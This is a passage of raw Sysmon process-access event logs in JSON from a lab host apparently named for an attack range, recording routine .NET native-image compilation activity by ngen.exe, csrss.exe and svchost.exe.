{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.371\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00100D4B0E00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.371","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00100D4B0E00}","TargetProcessId":"4636","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.371\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00100D4B0E00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.371","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00100D4B0E00}","TargetProcessId":"4636","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.386\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00100D4B0E00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.386","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00100D4B0E00}","TargetProcessId":"4636","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.433\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010224F0E00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.433","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010224F0E00}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.433\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010224F0E00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.433","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010224F0E00}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.449\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010224F0E00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.449","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010224F0E00}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001033530E00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001033530E00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001033530E00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 